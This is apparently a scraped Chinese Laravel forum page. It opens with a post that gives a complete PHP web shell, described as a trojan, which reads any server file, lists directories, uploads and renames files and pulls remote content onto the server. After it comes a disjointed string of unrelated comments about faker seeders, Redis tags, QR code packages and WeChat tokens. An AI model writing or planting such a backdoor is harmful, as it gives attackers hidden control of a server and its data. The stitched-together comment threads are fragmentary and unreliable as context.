主要功能：获取当前目录，扫描目录，获取文件内容，上传木马。

大概的内容如下：

<?php

// 关闭所有PHP错误报告
error_reporting(0);

/**
 * 这一段是申明函数名称，
 * 如：file_put_contents，move_uploaded_file，rename，dirname
 */

$dlform='<form method="post">
FN:<input name="fn" size="20" type="text">
URL:<input name="url" size="50" type="text">
<input type="submit" value="ok">
</form>';

$ulform='<form method="post" enctype="multipart/form-data">
<input name="uf" type="file">
SP:<input name="sp" size="50" type="text">
<input type="submit" value="ok">
</form>';
$rnform='<form method="post">
ON:<input name="on" size="50" type="text">
NN:<input name="nn" size="50" type="text">
<input type="submit" value="ok"></form>';
$lpform='<form method="post">
DP:<input name="dp" size="50" type="text">
<input type="submit" value="ok">
</form>';
$sfform='<form method="post">
DF:<input name="df" size="50" type="text">
<input type="submit" value="ok">
</form>';

// 将指定网站(url)下的源代码保存在 $_POST['fn'] 里
if($_GET['act']=='dl') {
    echo($dlform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        file_put_contents($_POST['fn'],file_get_contents($_POST['url']));
    }
    exit;
}

// 上传文件并重命名
if($_GET['act']=='ul') {
    echo($ulform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        $sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';
        move_uploaded_file(${"_FILES"}["uf"]["tmp_name"],$sp.${"_FILES"}["uf"]["name"]);
    }
    exit;
}

// 重命名指定文件或目录
if($_GET['act']=='rn') {
    echo($rnform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        rename($_POST['on'],$_POST['nn']);
    }
    exit;
}

// 获取当前路径
if($_GET['act']=='gp') {
    echo(dirname(__FILE__));
    exit;
}

// 循环扫描指定目录下的文件和文件夹
if($_GET['act']=='lp') {
    echo($lpform);
    if($_SERVER['REQUEST_METHOD']=='POST') {
        $dp=$_POST['dp'].'/';
        $h=opendir($dp);
        while(($fn=readdir($h))!==false) {
            if(is_dir($dp.$fn)) {
                $t1.='D '.$fn.'<br>';
            } else {
                $t2.='  '.$fn.'<br>';
            }
        }
        closedir($dp);
        echo($dp.'<br>'.$t1.$t2);
        }
        exit;
}

// 获取服务器上指定文件的内容(根据上面循环扫描得到全路径)
if($_GET['act']=='sf') {
    echo($sfform);
    if($_SERVER['REQUEST_METHOD']=='POST'){
        $df=$_POST['df'];
        echo('<textarea style="width:100%;height:100%;" wrap="off">'.file_get_contents($df).'</textarea>');
    }
    exit;
}

?>

可以看看：

composer require simplesoftwareio/simple-qrcode

用google浏览器点了没反应，用IE试，弹窗：

@Jade 这个只针对 IOS 吧？
我的电脑是 windows10，用不了？

@Jade 我用 phpstorm 和 sublime 试过，都打不开， sublime 不是破解版。

实际上就是在浏览器上打开：

subl://open?url=file://.........

我在错误页面看到了 open 字样，但是点击并没有任何反应，这个跟浏览器或IDE设置有关吗？

写错字了

@Summer 发广告的来了

@vescape920 从MySQL5.6版本开始支持InnoDB引擎的全文索引

@Summer 广告来了。。。

扩展 laravel-admin-extensions/china-distpicker

sql数据和js数据不一致

@leo
用create会生成100条sql，insert只会生成一条sql，

因为factory里嵌套了一些关联查询，这样生成数据就很慢。
不过还是感谢指出问题所在。:thumbsup:

@leo
不好意思，没看清楚，
这个是UserTableSeeder.php的

        $user = factory(\App\Models\User::class)->times(100)->make();
        DB::table('users')->insert($user->toArray());

这个是DatabaseSeeder.php的

         $this->call([
             UserTableSeeder::class,
         ]);

@leo
当使用模型修改器的$appends属性，新增元素时，使用faker生成假数据时，报错误：
Unknown column 'sex_str'

模型相关代码：

 protected $appends = ['sex_str'];
 public static $sexAttr = ['未知', '男', '女'];

 public function getSexStrAttribute()
 {
     return array_key_exists($this->sex, self::$sexAttr) ? self::$sexAttr[$this->sex] : '';
 }

faker相关代码：

$factory->define(\App\Models\User::class, function (Faker $faker) {
    return [

        'sex' => random_int(1, 2),

        ];
});

屏蔽$appends属性就正常了，怎么解决模型修改器影响生成假数据的问题？

模型修改器的用途是：数据库存的sex是int类型，取出时增加sex_str，转换为字符串。

生成假数据时，faker里加了sex生成的。

https://segmentfault.com/q/1010000017008395
segmentfault上补充说明，没人遇到过吗？

@liyu001989 获取微信的access_token有次数限制，这里不做存储每次都刷新吗？

windows下的redis不支持tag
所以会有这个错误

linux版的reids支持tag就不会有这样的错误

@lovecn 这个身份证的规则网上是公开的。
详情请看：身份证规则

laravel–china微信登录和支付不支持

同问